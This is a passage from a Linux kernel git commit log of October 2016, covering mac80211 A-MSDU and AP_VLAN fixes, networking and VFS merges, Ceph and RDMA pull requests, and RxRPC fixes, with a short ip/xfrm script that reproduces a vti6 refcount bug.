   that have no authorized station connected.
   No filtering happens on 4addr AP_VLAN interfaces.
2. makes filtering of multicast data packets sent on AP interfaces
   depend on the number of authorized stations in this bss not
   assigned to an AP_VLAN interface.

Therefore, a new num_mcast_sta counter is added for AP_VLAN interfaces.
The existing one for AP interfaces is altered to not track stations
assigned to an AP_VLAN interface.

The new counter is exposed in debugfs.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[reformat commit message a bit, unline ieee80211_vif_{inc,dec}_num_mcast]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 11:33:29 +02:00
Michael Braun
5f9994bd4a mac80211: remove unnecessary num_mcast_sta check
Checking for num_mcast_sta in __ieee80211_request_smps_ap() is
unnecessary as sta list will be empty in this case anyway, so
the list iteration will just exit immediately. Since this isn't
a "hot" code path, it doesn't really matter, and the next patch
will redefine num_mcast_sta to make this check invalid.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[change commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 11:11:08 +02:00
Johannes Berg
850092db5a mac80211: remove unnecessary mesh check
sta_info_get_bss() is equivalent to sta_info_get() in the
mesh case, since sta->sdata->bss will be NULL (it's only
set for AP/AP_VLAN interfaces.) Thus, the mesh check here
isn't actually needed - remove it.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 10:50:36 +02:00
Michael Braun
1d4de2e222 mac80211: fix CMD_FRAME for AP_VLAN
When using IEEE 802.11r FT OVER-DS roaming with AP_VLAN, hostapd needs to
send out a frame using CMD_FRAME for a station assigned to an AP_VLAN
interface.

Right now, the userspace needs to give the exact AP_VLAN interface index
for CMD_FRAME; hostapd does not do this. Additionally, userspace cannot
use GET_STATION to query the AP_VLAN ifidx, as while GET_STATION finds
stations assigned to AP_VLAN even if the AP iface is queried, it does not
return AP_VLAN ifidx (it returns the queried one).

This breaks IEEE 802.11r over_ds with vlans, as the reply frame does not
get out. This patch fixes this by using get_sta_bss for CMD_FRAME.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:12 +02:00
Johannes Berg
e2b5227faa mac80211: validate DA/SA during A-MSDU decapsulation
As pointed out by Michael Braun, we don't check inner L2 addresses
during A-MSDU decapsulation, leading to the possibility that, for
example, a station associated to an AP sends frames as though they
came from somewhere else.

Fix this problem by letting cfg80211 validate the addresses, as
indicated by passing in the ones that need to be validated.

Reported-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:11 +02:00
Johannes Berg
8b935ee2ea cfg80211: add ability to check DA/SA in A-MSDU decapsulation
We should not accept arbitrary DA/SA inside A-MSDUs, it could be used
to circumvent protections, like allowing a station to send frames and
make them seem to come from somewhere else.

Add the necessary infrastructure in cfg80211 to allow such checks, in
further patches we'll start using them.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:10 +02:00
Johannes Berg
7f6990c830 cfg80211: let ieee80211_amsdu_to_8023s() take only header-less SKB
There's only a single case where has_80211_header is passed as true,
which is in mac80211. Given that there's only simple code that needs
to be done before calling it, export that function from cfg80211
instead and let mac80211 call it itself.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:10 +02:00
Johannes Berg
ea720935cf mac80211: discard multicast and 4-addr A-MSDUs
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
 * drop A-MSDUs with a multicast A1 (RA), as required by the
   spec in 9.11 (802.11-2012 version)
 * drop A-MSDUs with a 4-addr header, since the fourth address
   can't actually be useful for them; unless 4-address frame
   format is actually requested, even though the fourth address
   is still not useful in this case, but ignored

Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.

Cc: stable@vger.kernel.org
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:09 +02:00
Ursula Braun
8c68b1a0e9 Subject: [PATCH] af_iucv: drop skbs rejected by filter
A packet filter might be installed for instance with setsockopt
SO_ATTACH_FILTER. af_iucv currently queues skbs rejected by filter
into the backlog queue. This does not make sense, since packets
rejected by filter can be dropped immediately. This patch adds
separate sk_filter return code checking, and dropping of packets
if applicable.

Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:56:04 -04:00
Ursula Braun
4e0ad32216 Subject: [PATCH] af_iucv: enable control sends in case of SEND_SHUTDOWN
If a socket program has shut down the socket for sending, it can still
receive an undetermined number of packets. The AF_IUCV protocol for
HIPER transport requires sending of a WIN flag from time to time
from the receiver to the sender, otherwise the peer cannot continue
sending. That means sending of control flags must still work, even
though the AF_IUCV socket is shutdown for sending data.
sock_alloc_send_skb() returns with error EPIPE, if socket sk_shutdown
is SEND_SHUTDOWN. Thus this patch temporarily removes the send
shutdown attribute from the socket to enable transfer of control
flags.

Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:56:04 -04:00
Geert Uytterhoeven
6d3a4c4046 strparser: Propagate correct error code in strp_recv()
With m68k-linux-gnu-gcc-4.1:

    net/strparser/strparser.c: In function ‘strp_recv’:
    net/strparser/strparser.c:98: warning: ‘err’ may be used uninitialized in this function

Pass "len" (which is an error code when negative) instead of the
uninitialized "err" variable to fix this.

Fixes: 43a0c6751a ("strparser: Stream parser for messages")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:51:49 -04:00
Jiri Benc
c66549ffd6 openvswitch: correctly fragment packet with mpls headers
If mpls headers were pushed to a defragmented packet, the refragmentation no
longer works correctly after 48d2ab609b ("net: mpls: Fixups for GSO"). The
network header has to be shifted after the mpls headers for the
fragmentation and restored afterwards.

Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:42:52 -04:00
Philippe Reynes
bb10bb3ea8 net: dsa: slave: use new api ethtool_{get|set}_link_ksettings
The ethtool api {get|set}_settings is deprecated.
We move this driver to new api {get|set}_link_ksettings.

Signed-off-by: Philippe Reynes <tremyfr@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:40:25 -04:00
Masahiro Yamada
97139d4a6f treewide: remove redundant #include <linux/kconfig.h>
Kernel source files need not include <linux/kconfig.h> explicitly
because the top Makefile forces to include it with:

  -include $(srctree)/include/linux/kconfig.h

This commit removes explicit includes except the following:

  * arch/s390/include/asm/facilities_src.h
  * tools/testing/radix-tree/linux/kernel.h

These two are used for host programs.

Link: http://lkml.kernel.org/r/1473656164-11929-1-git-send-email-yamada.masahiro@socionext.com
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-11 15:06:33 -07:00
Linus Torvalds
6b5e09a748 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:

 1) Netfilter list handling fix, from Linus.

 2) RXRPC/AFS bug fixes from David Howells (oops on call to serviceless
    endpoints, build warnings, missing notifications, etc.) From David
    Howells.

 3) Kernel log message missing newlines, from Colin Ian King.

 4) Don't enter direct reclaim in netlink dumps, the idea is to use a
    high order allocation first and fallback quickly to a 0-order
    allocation if such a high-order one cannot be done cheaply and
    without reclaim. From Eric Dumazet.

 5) Fix firmware download errors in btusb bluetooth driver, from Ethan
    Hsieh.

 6) Missing Kconfig deps for QCOM_EMAC, from Geert Uytterhoeven.

 7) Fix MDIO_XGENE dup Kconfig entry. From Laura Abbott.

 8) Constrain ipv6 rtr_solicits sysctl values properly, from Maciej
    Żenczykowski.

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (65 commits)
  netfilter: Fix slab corruption.
  be2net: Enable VF link state setting for BE3
  be2net: Fix TX stats for TSO packets
  be2net: Update Copyright string in be_hw.h
  be2net: NCSI FW section should be properly updated with ethtool for BE3
  be2net: Provide an alternate way to read pf_num for BEx chips
  wan/fsl_ucc_hdlc: Fix size used in dma_free_coherent()
  net: macb: NULL out phydev after removing mdio bus
  xen-netback: make sure that hashes are not send to unaware frontends
  Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion
  MAINTAINERS: add myself as a maintainer of xen-netback
  ipv6 addrconf: disallow rtr_solicits < -1
  Bluetooth: btusb: Fix atheros firmware download error
  drivers: net: phy: Correct duplicate MDIO_XGENE entry
  ethernet: qualcomm: QCOM_EMAC should depend on HAS_DMA and HAS_IOMEM
  net: ethernet: mediatek: remove hwlro property in the device tree
  net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi
  net: ethernet: mediatek: get the chip id by ETHDMASYS registers
  net: bgmac: Fix errant feature flag check
  netlink: do not enter direct reclaim from netlink_dump()
  ...
2016-10-11 08:10:19 -07:00
Nicolas Dichtel
7f92083eb5 vti6: flush x-netns xfrm cache when vti interface is removed
This is the same fix than commit a5d0dc810a ("vti: flush x-netns xfrm
cache when vti interface is removed")

This patch fixes a refcnt problem when a x-netns vti6 interface is removed:
unregister_netdevice: waiting for vti6_test to become free. Usage count = 1

Here is a script to reproduce the problem:

ip link set dev ntfp2 up
ip addr add dev ntfp2 2001::1/64
ip link add vti6_test type vti6 local 2001::1 remote 2001::2 key 1
ip netns add secure
ip link set vti6_test netns secure
ip netns exec secure ip link set vti6_test up
ip netns exec secure ip link s lo up
ip netns exec secure ip addr add dev vti6_test 2003::1/64
ip -6 xfrm policy add dir out tmpl src 2001::1 dst 2001::2 proto esp \
	   mode tunnel mark 1
ip -6 xfrm policy add dir in tmpl src 2001::2 dst 2001::1 proto esp \
	   mode tunnel mark 1
ip xfrm state add src 2001::1 dst 2001::2 proto esp spi 1 mode tunnel \
	   enc des3_ede 0x112233445566778811223344556677881122334455667788 mark 1
ip xfrm state add src 2001::2 dst 2001::1 proto esp spi 1 mode tunnel \
	   enc des3_ede 0x112233445566778811223344556677881122334455667788 mark 1
ip netns exec secure  ping6 -c 4 2003::2
ip netns del secure

CC: Lance Richardson <lrichard@redhat.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Acked-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-10-11 10:46:44 +02:00
Linus Torvalds
bd3769bfed netfilter: Fix slab corruption.
Use the correct pattern for singly linked list insertion and
deletion.  We can also calculate the list head outside of the
mutex.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: David S. Miller <davem@davemloft.net>

net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
 1 file changed, 33 insertions(+), 75 deletions(-)
2016-10-11 04:44:37 -04:00
Linus Torvalds
101105b171 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull more vfs updates from Al Viro:
 ">rename2() work from Miklos + current_time() from Deepa"

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  fs: Replace current_fs_time() with current_time()
  fs: Replace CURRENT_TIME_SEC with current_time() for inode timestamps
  fs: Replace CURRENT_TIME with current_time() for inode timestamps
  fs: proc: Delete inode time initializations in proc_alloc_inode()
  vfs: Add current_time() api
  vfs: add note about i_op->rename changes to porting
  fs: rename "rename2" i_op to "rename"
  vfs: remove unused i_op->rename
  fs: make remaining filesystems use .rename2
  libfs: support RENAME_NOREPLACE in simple_rename()
  fs: support RENAME_NOREPLACE for local filesystems
  ncpfs: fix unused variable warning
2016-10-10 20:16:43 -07:00
Al Viro
3873691e5a Merge remote-tracking branch 'ovl/rename2' into for-linus 2016-10-10 23:02:51 -04:00
Linus Torvalds
97d2116708 Merge branch 'work.xattr' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull vfs xattr updates from Al Viro:
 "xattr stuff from Andreas

  This completes the switch to xattr_handler ->get()/->set() from
  ->getxattr/->setxattr/->removexattr"

* 'work.xattr' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  vfs: Remove {get,set,remove}xattr inode operations
  xattr: Stop calling {get,set,remove}xattr inode operations
  vfs: Check for the IOP_XATTR flag in listxattr
  xattr: Add __vfs_{get,set,remove}xattr helpers
  libfs: Use IOP_XATTR flag for empty directory handling
  vfs: Use IOP_XATTR flag for bad-inode handling
  vfs: Add IOP_XATTR inode operations flag
  vfs: Move xattr_resolve_name to the front of fs/xattr.c
  ecryptfs: Switch to generic xattr handlers
  sockfs: Get rid of getxattr iop
  sockfs: getxattr: Fail with -EOPNOTSUPP for invalid attribute names
  kernfs: Switch to generic xattr handlers
  hfs: Switch to generic xattr handlers
  jffs2: Remove jffs2_{get,set,remove}xattr macros
  xattr: Remove unnecessary NULL attribute name check
2016-10-10 17:11:50 -07:00
Emese Revfy
0766f788eb latent_entropy: Mark functions with __latent_entropy
The __latent_entropy gcc attribute can be used only on functions and
variables.  If it is on a function then the plugin will instrument it for
gathering control-flow entropy. If the attribute is on a variable then
the plugin will initialize it with random contents.  The variable must
be an integer, an integer array type or a structure with integer fields.

These specific functions have been selected because they are init
functions (to help gather boot-time entropy), are called at unpredictable
times, or they have variable loops, each of which provide some level of
latent entropy.

Signed-off-by: Emese Revfy <re.emese@gmail.com>
[kees: expanded commit message]
Signed-off-by: Kees Cook <keescook@chromium.org>
2016-10-10 14:51:45 -07:00
Linus Torvalds
8dfb790b15 The big ticket item here is support for rbd exclusive-lock feature,
with maintenance operations offloaded to userspace (Douglas Fuller,
 Mike Christie and myself).  Another block device bullet is a series
 fixing up layering error paths (myself).
 
 On the filesystem side, we've got patches that improve our handling of
 buffered vs dio write races (Neil Brown) and a few assorted fixes from
 Zheng.  Also included a couple of random cleanups and a minor CRUSH
 update.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v2
 
 iQEcBAABCAAGBQJX+PjZAAoJEEp/3jgCEfOLVuoH/RwtFLIb6/KZUYtBOrVVrTun
 kReRlfq2xKYrGGtyQEqSuz7fBdwT1LVCVcL8kC4GFD4R67o+tNMAr6PfM/7pZABj
 HRoRLgSZ9FLw4W5n0VpBIznih75QUbCdXiTCtH9eorMHU5q1YpTvVHHlF9W9Pm2I
 eNGnBWpGyHVeiK66mpUCH+EQKQ4GkAVD9rneTNqLHgq2yotHkVl1j258+DL6JRGs
 OBoh3RmNQaGOAS37Lss8erCSusAGEcAeGV6ubuK2lFUKyR41EkD3I0xkhNSPe+CD
 RifFcpVziIeTu//cLgl0nnHGtmUytD7HgJubaPthArKIOen9ZDAfEkgI0o+JI2A=
 =45O7
 -----END PGP SIGNATURE-----

Merge tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client

Pull Ceph updates from Ilya Dryomov:
 "The big ticket item here is support for rbd exclusive-lock feature,
  with maintenance operations offloaded to userspace (Douglas Fuller,
  Mike Christie and myself). Another block device bullet is a series
  fixing up layering error paths (myself).

  On the filesystem side, we've got patches that improve our handling of
  buffered vs dio write races (Neil Brown) and a few assorted fixes from
  Zheng. Also included a couple of random cleanups and a minor CRUSH
  update"

* tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client: (39 commits)
  crush: remove redundant local variable
  crush: don't normalize input of crush_ln iteratively
  libceph: ceph_build_auth() doesn't need ceph_auth_build_hello()
  libceph: use CEPH_AUTH_UNKNOWN in ceph_auth_build_hello()
  ceph: fix description for rsize and rasize mount options
  rbd: use kmalloc_array() in rbd_header_from_disk()
  ceph: use list_move instead of list_del/list_add
  ceph: handle CEPH_SESSION_REJECT message
  ceph: avoid accessing / when mounting a subpath
  ceph: fix mandatory flock check
  ceph: remove warning when ceph_releasepage() is called on dirty page
  ceph: ignore error from invalidate_inode_pages2_range() in direct write
  ceph: fix error handling of start_read()
  rbd: add rbd_obj_request_error() helper
  rbd: img_data requests don't own their page array
  rbd: don't call rbd_osd_req_format_read() for !img_data requests
  rbd: rework rbd_img_obj_exists_submit() error paths
  rbd: don't crash or leak on errors in rbd_img_obj_parent_read_full_callback()
  rbd: move bumping img_request refcount into rbd_obj_request_submit()
  rbd: mark the original request as done if stat request fails
  ...
2016-10-10 13:52:05 -07:00
Linus Torvalds
b9044ac829 Merge of primary rdma-core code for 4.9
- Updates to mlx5
 - Updates to mlx4 (two conflicts, both minor and easily resolved)
 - Updates to iw_cxgb4 (one conflict, not so obvious to resolve, proper
   resolution is to keep the code in cxgb4_main.c as it is in Linus'
   tree as attach_uld was refactored and moved into cxgb4_uld.c)
 - Improvements to uAPI (moved vendor specific API elements to uAPI area)
 - Add hns-roce driver and hns and hns-roce ACPI reset support
 - Conversion of all rdma code away from deprecated
   create_singlethread_workqueue
 - Security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
   staging)
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX+AwSAAoJELgmozMOVy/d0WkQAKxPzVccMWwHv28iZI4ey13u
 JwE+VoCNpCAZAVuEgzK5zzFdNHPvAk2jU93H4apA7dfXJBXPatVuj9Lnk+ieEEnW
 tbFwJjBpbQ3Zol3+SPfAHnsVMbtax+xmd6WDKExPXXEDl1L6rutwL3KKfmgWEitg
 ysX7XOJCiSdyM0hcg4T6UPB9a3jGPff9NLu0oGamV+yoUk5Y0WGoVFxHZ4MKcw8t
 OkFBYIxGz4SGwq2tulStuH03HteURX594KngtrA8dyq6l1R2GlGRv+bkJAUEIWUv
 aA0ow3VWusOM6fT+jLXPCv8iUwIXM8tR/U6F7X+cmORUUtWvCl+uCUVid113j/aN
 BK+Af2nJnfoJ5cDBPsD+bC76l5gQycNZO/Qh8op2kmgJtD+6OpGM3cBXsHx53+kk
 0wloJ2lKCGShWxNj+ig8n8rR/rhhs/x3vV3ouCVWNMbOUgOSN3eYHxmK3wGFW4nd
 Qx+WYCjj9Yi/J6nmUDcfEQ4NWPR22Q2+0ENAabfhLhV6mDloAO5ILHd4GDqC3IA9
 UtxlVjf4ZonaiLnTQQzCnDMGVVk6tT8FJ9D42s0ScwjbdYwjyCW9/rs/g2EhcprR
 Cc+AmjqLviCWGtzBSFO0SijqQon8lcQOwdLw61CdFFvPa/mlLdf1rbx9ArIyNVKn
 JSrbr3CGyoqyYj6qaEO5
 =LC+S
 -----END PGP SIGNATURE-----

Merge tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma

Pull main rdma updates from Doug Ledford:
 "This is the main pull request for the rdma stack this release.  The
  code has been through 0day and I had it tagged for linux-next testing
  for a couple days.

  Summary:

   - updates to mlx5

   - updates to mlx4 (two conflicts, both minor and easily resolved)

   - updates to iw_cxgb4 (one conflict, not so obvious to resolve,
     proper resolution is to keep the code in cxgb4_main.c as it is in
     Linus' tree as attach_uld was refactored and moved into
     cxgb4_uld.c)

   - improvements to uAPI (moved vendor specific API elements to uAPI
     area)

   - add hns-roce driver and hns and hns-roce ACPI reset support

   - conversion of all rdma code away from deprecated
     create_singlethread_workqueue

   - security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
     staging)"

* tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma: (75 commits)
  staging/lustre: Disable InfiniBand support
  iw_cxgb4: add fast-path for small REG_MR operations
  cxgb4: advertise support for FR_NSMR_TPTE_WR
  IB/core: correctly handle rdma_rw_init_mrs() failure
  IB/srp: Fix infinite loop when FMR sg[0].offset != 0
  IB/srp: Remove an unused argument
  IB/core: Improve ib_map_mr_sg() documentation
  IB/mlx4: Fix possible vl/sl field mismatch in LRH header in QP1 packets
  IB/mthca: Move user vendor structures
  IB/nes: Move user vendor structures
  IB/ocrdma: Move user vendor structures
  IB/mlx4: Move user vendor structures
  IB/cxgb4: Move user vendor structures
  IB/cxgb3: Move user vendor structures
  IB/mlx5: Move and decouple user vendor structures
  IB/{core,hw}: Add constant for node_desc
  ipoib: Make ipoib_warn ratelimited
  IB/mlx4/alias_GUID: Remove deprecated create_singlethread_workqueue
  IB/ipoib_verbs: Remove deprecated create_singlethread_workqueue
  IB/ipoib: Remove deprecated create_singlethread_workqueue
  ...
2016-10-09 17:04:33 -07:00
David S. Miller
2f7c68d8e6 Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth
Johan Hedberg says:

====================
pull request: bluetooth 2016-10-08

Here are a couple of Bluetooth fixes for the 4.9 kernel:

 - Firmware download fix for Atheros controllers
 - Fixes to the content of LE scan response
 - New USB ID for a Marvell chipset

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-08 08:24:37 -04:00
Linus Torvalds
b66484cd74 Merge branch 'akpm' (patches from Andrew)
Merge updates from Andrew Morton:

 - fsnotify updates

 - ocfs2 updates

 - all of MM

* emailed patches from Andrew Morton <akpm@linux-foundation.org>: (127 commits)
  console: don't prefer first registered if DT specifies stdout-path
  cred: simpler, 1D supplementary groups
  CREDITS: update Pavel's information, add GPG key, remove snail mail address
  mailmap: add Johan Hovold
  .gitattributes: set git diff driver for C source code files
  uprobes: remove function declarations from arch/{mips,s390}
  spelling.txt: "modeled" is spelt correctly
  nmi_backtrace: generate one-line reports for idle cpus
  arch/tile: adopt the new nmi_backtrace framework
  nmi_backtrace: do a local dump_stack() instead of a self-NMI
  nmi_backtrace: add more trigger_*_cpu_backtrace() methods
  min/max: remove sparse warnings when they're nested
  Documentation/filesystems/proc.txt: add more description for maps/smaps
  mm, proc: fix region lost in /proc/self/smaps
  proc: fix timerslack_ns CAP_SYS_NICE check when adjusting self
  proc: add LSM hook checks to /proc/<tid>/timerslack_ns
  proc: relax /proc/<tid>/timerslack_ns capability requirements
  meminfo: break apart a very long seq_printf with #ifdefs
  seq/proc: modify seq_put_decimal_[u]ll to take a const char *, not char
  proc: faster /proc/*/status
  ...
2016-10-07 21:38:00 -07:00
Maciej Żenczykowski
cb4a4c691e ipv6 addrconf: disallow rtr_solicits < -1
This disallows setting /proc/sys/net/ipv6/conf/*/router_solicitations
to values below -1.

-1 continues to mean an unlimited number of retransmits.

Note: this depends on 'ipv6 addrconf: remove addrconf_sysctl_hop_limit()'

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-07 23:43:56 -04:00
Andreas Gruenbacher
fd50ecaddf vfs: Remove {get,set,remove}xattr inode operations
These inode operations are no longer used; remove them.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-07 21:48:36 -04:00
Alexey Dobriyan
81243eacfa cred: simpler, 1D supplementary groups
Current supplementary groups code can massively overallocate memory and
is implemented in a way so that access to individual gid is done via 2D
array.

If number of gids is <= 32, memory allocation is more or less tolerable
(140/148 bytes).  But if it is not, code allocates full page (!)
regardless and, what's even more fun, doesn't reuse small 32-entry
array.

2D array means dependent shifts, loads and LEAs without possibility to
optimize them (gid is never known at compile time).

All of the above is unnecessary.  Switch to the usual
trailing-zero-len-array scheme.  Memory is allocated with
kmalloc/vmalloc() and only as much as needed.  Accesses become simpler
(LEA 8(gi,idx,4) or even without displacement).

Maximum number of gids is 65536 which translates to 256KB+8 bytes.  I
think kernel can handle such allocation.

On my usual desktop system with whole 9 (nine) aux groups, struct
group_info shrinks from 148 bytes to 44 bytes, yay!

Nice side effects:

 - "gi->gid[i]" is shorter than "GROUP_AT(gi, i)", less typing,

 - fix little mess in net/ipv4/ping.c
   should have been using GROUP_AT macro but this point becomes moot,

 - aux group allocation is persistent and should be accounted as such.

Link: http://lkml.kernel.org/r/20160817201927.GA2096@p183.telecom.by
Signed-off-by: Alexey Dobriyan <adobriyan@gmail.com>
Cc: Vasily Kulikov <segoon@openwall.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-07 18:46:30 -07:00
Johannes Weiner
2d75807383 mm: memcontrol: consolidate cgroup socket tracking
The cgroup core and the memory controller need to track socket ownership
for different purposes, but the tracking sites being entirely different
is kind of ugly.

Be a better citizen and rename the memory controller callbacks to match
the cgroup core callbacks, then move them to the same place.

[akpm@linux-foundation.org: coding-style fixes]
Link: http://lkml.kernel.org/r/20160914194846.11153-3-hannes@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Tejun Heo <tj@kernel.org>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: Michal Hocko <mhocko@suse.cz>
Cc: Vladimir Davydov <vdavydov@virtuozzo.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-07 18:46:29 -07:00
Linus Torvalds
d1f5323370 Merge branch 'work.splice_read' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull VFS splice updates from Al Viro:
 "There's a bunch of branches this cycle, both mine and from other folks
  and I'd rather send pull requests separately.

  This one is the conversion of ->splice_read() to ITER_PIPE iov_iter
  (and introduction of such). Gets rid of a lot of code in fs/splice.c
  and elsewhere; there will be followups, but these are for the next
  cycle...  Some pipe/splice-related cleanups from Miklos in the same
  branch as well"

* 'work.splice_read' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  pipe: fix comment in pipe_buf_operations
  pipe: add pipe_buf_steal() helper
  pipe: add pipe_buf_confirm() helper
  pipe: add pipe_buf_release() helper
  pipe: add pipe_buf_get() helper
  relay: simplify relay_file_read()
  switch default_file_splice_read() to use of pipe-backed iov_iter
  switch generic_file_splice_read() to use of ->read_iter()
  new iov_iter flavour: pipe-backed
  fuse_dev_splice_read(): switch to add_to_pipe()
  skb_splice_bits(): get rid of callback
  new helper: add_to_pipe()
  splice: lift pipe_lock out of splice_to_pipe()
  splice: switch get_iovec_page_array() to iov_iter
  splice_to_pipe(): don't open-code wakeup_pipe_readers()
  consistent treatment of EFAULT on O_DIRECT read/write
2016-10-07 15:36:58 -07:00
Andreas Gruenbacher
bba0bd31b1 sockfs: Get rid of getxattr iop
If we allow pseudo-filesystems created with mount_pseudo to have xattr
handlers, we can replace sockfs_getxattr with a sockfs_xattr_get handler
to use the xattr handler name parsing.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-06 22:17:38 -04:00
Andreas Gruenbacher
971df15bd5 sockfs: getxattr: Fail with -EOPNOTSUPP for invalid attribute names
The standard return value for unsupported attribute names is
-EOPNOTSUPP, as opposed to undefined but supported attributes
(-ENODATA).

Also, fail for attribute names like "system.sockprotonameXXX" and
simplify the code a bit.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-06 22:17:38 -04:00
David S. Miller
0d818c2889 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV/YbX/Sw1s6N8H32AQLwDg//W0fGt3OSFrOpEQHtKUSCWO3m4RRJgn/m
 Xbaz8ZO6Z8qmdkM267yrLCAp5hx0E77WP46l7V3B9p9wX0vA+P2QO7K5Kis6sNaY
 aceCCAKHqvUSiZa8tQ2aGpbxxa8qICbjHjiCg0lFABiGDWGRnIBNW8qV5LyGKZkI
 7b3i9MGBkGLdZxetcJd498j6Gck9cuqOZDnfqgb0Q5pAtsjVM3EZXXsHO1ZD5WHG
 GUieQgY9Tp0rlVKjlLdR94fW/acMZYs0c5RO1uzGAoUeBALnSUS5+bSRSlGp1KOM
 C7r5/dK4FvkZY+xuS5pLXoI8WpsA4EDpBINGdO6L03wTJ10zx5y5CdTTl7G6Y53R
 BpmY8SDFmWYqpJs+gZiWYIlbnBQ+b0Mu7p7rKeSJS/q0+YEVwJlz3UFo2k1O+J3A
 ovpxP5E6IvOjlKF21Zs1hOR2m/sfR42v/TfwpApImSeY2k2m8vzyfXBJP4ClAk29
 PGYOOqMLYwzIjLwdapDxL3ccjKvOwYeClCs1t6bKva2XCrF1ybtBnAQDxFp6KzXi
 p/y/QkHnseSeYct8mElDopRekbwoqa9YPwXn7lagvQhNxqNGIR4HT82IeohI/Dqe
 GtQbjSPc3uebk5lRf535kTZixu+l5/yKQeuRTsfoIgsMjVlMdqS9dUAphzI4IXLp
 FE0q49uLTVI=
 =+Jr3
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20161004' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes

This set of patches contains a bunch of fixes:

 (1) Fix an oops on incoming call to a local endpoint without a bound
     service.

 (2) Only ping for a lost reply in a client call (this is inapplicable to
     service calls).

 (3) Fix maybe uninitialised variable warnings in the ACK/ABORT sending
     function by splitting it.

 (4) Fix loss of PING RESPONSE ACKs due to them being subsumed by PING ACK
     generation.

 (5) OpenAFS improperly terminates calls it makes as a client under some
     circumstances by not fully hard-ACK'ing the last DATA packets.  This
     is alleviated by a new call appearing on the same channel implicitly
     completing the previous call on that channel.  Handle this implicit
     completion.

 (6) Properly handle expiry of service calls due to the aforementioned
     improper termination with no follow up call to implicitly complete it:

     (a) The call's background processor needs to be queued to complete the
     	 call, send an abort and notify the socket.

     (b) The call's background processor needs to notify the socket (or the
     	 kernel service) when it has completed the call.

